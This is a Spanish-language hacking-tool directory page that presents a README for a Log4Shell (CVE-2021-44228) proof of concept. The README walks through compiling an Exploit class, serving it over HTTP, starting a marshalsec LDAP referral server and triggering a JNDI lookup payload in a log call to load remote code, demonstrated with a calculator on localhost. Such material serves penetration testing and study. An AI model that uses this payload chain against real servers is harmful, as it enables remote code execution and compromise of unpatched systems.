Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228-Log4Shell-POC — Prueba de concepto para Log4Shell (CVE-2021-44228) que demuestra la ejecución remota de código basada en JNDI a través de servidores LDAP y HTTP. | Kitploit
Herramientas/GitHubGitHub/coldfusionx/cve-2021-44228-log4shell-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubcoldfusionx/cve-2021-44228-log4shell-poc

CVE-2021-44228-Log4Shell-POC

Prueba de concepto para Log4Shell (CVE-2021-44228) que demuestra la ejecución remota de código basada en JNDI a través de servidores LDAP y HTTP.

Ver Repositorio
21hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228-Log4Shell-POC

POC completo para la infame Log4j CVE-2021-44228

Requisitos previos

  • Descargar e instalar Java desde aquí, puedes usar jdk-8u181.
  • Instalar IntelliJ Idea desde aquí

POC

  • Paso 1 : Clonar este repositorio.
  • Paso 2 : Mover el archivo Exploit.java a una carpeta diferente. Como en mi caso, he creado una carpeta rce dentro del directorio home. /home/coldfusionx/rce

mov

  • Paso 3 : Echar un vistazo a Exploit.java Aquí puedes cambiar el código remoto a lo que quieras, en este caso esto abriría en una máquina ubuntu.
gnome-calculator

exp

  • Paso 4 : A continuación necesitamos compilar Exploit.java usando el comando javac Exploit.java, una vez compilado correctamente deberíamos ver que se crea un nuevo archivo Exploit.class.

com

  • Paso 5 : Iniciar un servidor http de python para alojar Exploit.class usando python3 -m http.server 8888, alternativamente también puedes usar un servidor php con el comando php -S 127.0.0.1:8888.

sv

  • Paso 6 : Cargar los archivos del proyecto en IntelliJ Idea y dejar que maven complete la indexación de archivos. Una vez completado, tu proyecto debería verse así :

poc1

  • Paso 7 : Para ejecutar el proyecto, necesitamos crear una configuración, haz clic en Add Configuration

poc2

root@kitploit:~
1. Seleccionar `Application`

poc3

root@kitploit:~
2. Seleccionar la clase principal

main

root@kitploit:~
3. Seleccionar el JDK y aplicar.

poc4

root@kitploit:~
4. Deberías ver la Aplicación Log4j creada, lista para ejecutarse.

poc5

  • Paso 8 : A continuación iniciamos el LDAPRefServer usando marshalsec :
  • cd marshasec
  • Ejecutar java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit" para iniciar el servidor LDAP, aquí 127.0.0.1:8888 es el servidor python que aloja Exploit.class, por lo tanto especificamos /#Exploit

ldap

  • Paso 9 : Editar el payload JNDI en log4j.java según tu requisito, logger.error("${jndi:ldap://127.0.0.1:1389/Exploit}"); En este caso estamos cargando la clase remota Exploit, el servidor referrer LDAP redirigirá la solicitud a nuestro servidor python que aloja la clase maliciosa Exploit.

  • Paso 10 : Ejecutar Log4j, En una ejecución exitosa deberías ver una calculadora gnome aparecer.

rce

Consulta mi análisis detallado sobre Log4Shell CVE-2021-44228

Referencia

  • https://nvd.nist.gov/vuln/detail/CVE-2021-44228
Descargar herramienta